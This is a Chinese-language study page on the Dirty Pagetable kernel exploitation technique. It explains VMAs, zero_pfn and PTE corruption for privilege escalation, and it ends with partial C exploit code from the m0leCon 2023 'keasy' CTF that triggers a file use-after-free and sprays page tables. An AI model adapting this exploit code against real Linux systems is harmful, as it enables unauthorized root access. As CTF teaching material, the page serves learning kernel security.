> For the complete documentation index, see [llms.txt](https://lightc.gitbook.io/pwn-gitbook/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://lightc.gitbook.io/pwn-gitbook/kpwn/kpwn-tricks/dirtypagetable-yuan-li.md).

# Dirty-Pagetable原理

### fetipop

[fetipop – kqx](https://kqx.io/post/fetipop/)

调用mmap时物理地址不会立即被映射，而是创建一个VMA用于描述用户空间虚拟映射的结构

其结构体如下

[mm\_types.h - include/linux/mm\_types.h - Linux source code v7.0.10 - Bootlin Elixir Cross Referencer](https://elixir.bootlin.com/linux/v7.0.10/source/include/linux/mm_types.h#L913)

```c
struct vm_area_struct {
	/* The first cache line has the info for VMA tree walking. */

	union {
		struct {
			/* VMA covers [vm_start; vm_end) addresses within mm */
			unsigned long vm_start;
			unsigned long vm_end;
		};
		freeptr_t vm_freeptr; /* Pointer used by SLAB_TYPESAFE_BY_RCU */
	};

	/*
	 * The address space we belong to.
	 * Unstable RCU readers are allowed to read this.
	 */
	struct mm_struct *vm_mm;
	pgprot_t vm_page_prot;          /* Access permissions of this VMA. */

	/*
	 * Flags, see mm.h.
	 * To modify use vm_flags_{init|reset|set|clear|mod} functions.
	 * Preferably, use vma_flags_xxx() functions.
	 */
	union {
		/* Temporary while VMA flags are being converted. */
		const vm_flags_t vm_flags;
		vma_flags_t flags;
	};

#ifdef CONFIG_PER_VMA_LOCK
	/*
	 * Can only be written (using WRITE_ONCE()) while holding both:
	 *  - mmap_lock (in write mode)
	 *  - vm_refcnt bit at VM_REFCNT_EXCLUDE_READERS_FLAG is set
	 * Can be read reliably while holding one of:
	 *  - mmap_lock (in read or write mode)
	 *  - vm_refcnt bit at VM_REFCNT_EXCLUDE_READERS_BIT is set or vm_refcnt > 1
	 * Can be read unreliably (using READ_ONCE()) for pessimistic bailout
	 * while holding nothing (except RCU to keep the VMA struct allocated).
	 *
	 * This sequence counter is explicitly allowed to overflow; sequence
	 * counter reuse can only lead to occasional unnecessary use of the
	 * slowpath.
	 */
	unsigned int vm_lock_seq;
#endif
	/*
	 * A file's MAP_PRIVATE vma can be in both i_mmap tree and anon_vma
	 * list, after a COW of one of the file pages.	A MAP_SHARED vma
	 * can only be in the i_mmap tree.  An anonymous MAP_PRIVATE, stack
	 * or brk vma (with NULL file) can only be in an anon_vma list.
	 */
	struct list_head anon_vma_chain; /* Serialized by mmap_lock &
					  * page_table_lock */
	struct anon_vma *anon_vma;	/* Serialized by page_table_lock */

	/* Function pointers to deal with this struct. */
	const struct vm_operations_struct *vm_ops;

	/* Information about our backing store: */
	unsigned long vm_pgoff;		/* Offset (within vm_file) in PAGE_SIZE
					   units */
	struct file * vm_file;		/* File we map to (can be NULL). */
	void * vm_private_data;		/* was vm_pte (shared mem) */

#ifdef CONFIG_SWAP
	atomic_long_t swap_readahead_info;
#endif
#ifndef CONFIG_MMU
	struct vm_region *vm_region;	/* NOMMU mapping region */
#endif
#ifdef CONFIG_NUMA
	struct mempolicy *vm_policy;	/* NUMA policy for the VMA */
#endif
#ifdef CONFIG_NUMA_BALANCING
	struct vma_numab_state *numab_state;	/* NUMA Balancing state */
#endif
#ifdef CONFIG_PER_VMA_LOCK
	/*
	 * Used to keep track of firstly, whether the VMA is attached, secondly,
	 * if attached, how many read locks are taken, and thirdly, if the
	 * VM_REFCNT_EXCLUDE_READERS_FLAG is set, whether any read locks held
	 * are currently in the process of being excluded.
	 *
	 * This value can be equal to:
	 *
	 * 0 - Detached. IMPORTANT: when the refcnt is zero, readers cannot
	 * increment it.
	 *
	 * 1 - Attached and either unlocked or write-locked. Write locks are
	 * identified via __is_vma_write_locked() which checks for equality of
	 * vma->vm_lock_seq and mm->mm_lock_seq.
	 *
	 * >1, < VM_REFCNT_EXCLUDE_READERS_FLAG - Read-locked or (unlikely)
	 * write-locked with other threads having temporarily incremented the
	 * reference count prior to determining it is write-locked and
	 * decrementing it again.
	 *
	 * VM_REFCNT_EXCLUDE_READERS_FLAG - Detached, pending
	 * __vma_end_exclude_readers() completion which will decrement the
	 * reference count to zero. IMPORTANT - at this stage no further readers
	 * can increment the reference count. It can only be reduced.
	 *
	 * VM_REFCNT_EXCLUDE_READERS_FLAG + 1 - A thread is either write-locking
	 * an attached VMA and has yet to invoke __vma_end_exclude_readers(),
	 * OR a thread is detaching a VMA and is waiting on a single spurious
	 * reader in order to decrement the reference count. IMPORTANT - as
	 * above, no further readers can increment the reference count.
	 *
	 * > VM_REFCNT_EXCLUDE_READERS_FLAG + 1 - A thread is either
	 * write-locking or detaching a VMA is waiting on readers to
	 * exit. IMPORTANT - as above, no further readers can increment the
	 * reference count.
	 *
	 * NOTE: Unstable RCU readers are allowed to read this.
	 */
	refcount_t vm_refcnt ____cacheline_aligned_in_smp;
#ifdef CONFIG_DEBUG_LOCK_ALLOC
	struct lockdep_map vmlock_dep_map;
#endif
#endif
	/*
	 * For areas with an address space and backing store,
	 * linkage into the address_space->i_mmap interval tree.
	 *
	 */
	struct {
		struct rb_node rb;
		unsigned long rb_subtree_last;
	} shared;
#ifdef CONFIG_ANON_VMA_NAME
	/*
	 * For private and shared anonymous mappings, a pointer to a null
	 * terminated string containing the name given to the vma, or NULL if
	 * unnamed. Serialized by mmap_lock. Use anon_vma_name to access.
	 */
	struct anon_vma_name *anon_name;
#endif
	struct vm_userfaultfd_ctx vm_userfaultfd_ctx;
#ifdef __HAVE_PFNMAP_TRACKING
	struct pfnmap_track_ctx *pfnmap_track_ctx;
#endif
} __randomize_layout;
```

mmap将这些分配的虚拟地址所对应的页表项全部指向zero\_pfn(page frame number)，权限设为只读，这样分配的页全是0x00满足了要求，也提高了效率，在存储数据前无需消耗内存

对未映射的地址进行写入操作触发缺页异常，内核会遍历VMA，如果发生异常的地址存在对应的VMA，则会分配并映射物理页，进程继续执行

通过映射zero\_pfn可以泄露一个属于内核内存区域的地址

在每个linux版本，IDT都紧跟在zero\_pfn之后映射，这意味着通过破坏PTE（页表项），可以获得对IDT的读写访问权限，进而导致权限提升

方法比如有

**struct file UAF**

[Understanding Dirty Pagetable - m0leCon Finals 2023 CTF Writeup - CTFするぞ](https://ptr-yudai.hatenablog.com/entry/2023/12/08/093606)

[m0leCon\_CTF\_Finals / keasy — writeups-2023 — Bitbucket](https://bitbucket.org/ptr-yudai/writeups-2023/src/master/m0leCon_CTF_Finals/keasy/)

此时在专用SLAB缓存也可完成利用（通过files\_cache的专用slab缓存进行分配，文件以外的对象不会占据UAF的文件对象）

**cross-cache attack**

堆喷在专用缓存中的对象，一个对象进行UAF，其他全部释放，使该slab页面被释放

从伙伴系统取回释放的页面进行利用

**dirty cred**

**dirty pagetable**

虚拟地址通过四级页表转变为物理地址，这种方法针对的是PTE（物理内存前的最后一级映射）

创建新的PTE时，伙伴系统为PTE分配对应的物理页帧

我们可以在UAF的指针上分配一个PTE

```c
void bind_core(int core) {
  cpu_set_t cpu_set;
  CPU_ZERO(&cpu_set);
  CPU_SET(core, &cpu_set);
  sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
}
...
int main() {
  int file_spray[N_FILESPRAY];
  void *page_spray[N_PAGESPRAY];
  // Pin CPU (important!)
  bind_core(0);
  // Open vulnerable device
  int fd = open("/dev/keasy", O_RDWR);
  if (fd == -1)
    fatal("/dev/keasy");
  // Prepare pages (PTE not allocated at this moment)
  for (int i = 0; i < N_PAGESPRAY; i++) {
    page_spray[i] = mmap((void*)(0xdead0000UL + i*0x10000UL),
                         0x8000, PROT_READ|PROT_WRITE,
                         MAP_ANONYMOUS|MAP_SHARED, -1, 0);
    if (page_spray[i] == MAP_FAILED) fatal("mmap");
  }
  puts("[+] Spraying files...");
  // Spray file (1)
  for (int i = 0; i < N_FILESPRAY/2; i++)
    if ((file_spray[i] = open("/", O_RDONLY)) < 0) fatal("/");
  // Get dangling file descriptorz
  int ezfd = file_spray[N_FILESPRAY/2-1] + 1;
  if (ioctl(fd, 0, 0xdeadbeef) == 0) // Use-after-Free
    fatal("ioctl did not fail");
  // Spray file (2)
  for (int i = N_FILESPRAY/2; i < N_FILESPRAY; i++)
    if ((file_spray[i] = open("/", O_RDONLY)) < 0) fatal("/");
  puts("[+] Releasing files...");
  // Release the page for file slab cache
  for (int i = 0; i < N_FILESPRAY; i++)
    close(file_spray[i]);
  puts("[+] Allocating PTEs...");
  // Allocate many PTEs (page fault)
  for (int i = 0; i < N_PAGESPRAY; i++)
    for (int j = 0; j < 8; j++)
      *(char*)(page_spray[i] + j*0x1000) = 'A' + j;
  getchar();
  return 0;
}
```
